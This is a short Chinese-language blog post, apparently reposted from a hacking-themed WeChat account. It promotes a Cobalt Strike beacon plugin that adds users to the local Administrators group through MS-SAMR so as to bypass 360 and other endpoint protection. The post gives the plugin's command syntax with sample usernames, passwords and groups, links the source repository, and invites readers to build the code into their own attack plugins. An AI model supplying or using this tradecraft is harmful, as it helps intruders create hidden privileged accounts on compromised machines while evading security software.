工具简介
@AgeloVito师傅写的一个通过MS-SAMR协议将用户添加到管理员组的CobaltStrike插件,所以暂时可以用来绕过部分安全防护添加管理员用户。
工具使用
下载地址
我们在cobaltstrike中使用shell、execute、run几个命令添加用户时都会被360等安全防护软件拦截,如下图所示。
加载adduserbysamr.cna,使用adduserbysamr命令通过samr将用户添加到localgroup,groupName默认为“Administrators”,请勿在AD中使用。
beacon> help adduserbysamr
Use: adduserbysamr [username] [groupName]
e.g: adduserbysamr sysadmin p@ssw0rd
adduserbysamr sysadmin p@ssw0rd Administrators
adduserbysamr sysadmin p@ssw0rd "Remote Desktop Users"
绕过360成功添加管理员用户...,我们还可以修改下这个项目代码集成到自己的cobaltstrike插件中使用。
https://github.com/AgeloVito/adduserbysamr-bof
原文始发于微信公众号(Hack分享吧):Bypass 360添加管理员用户插件
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论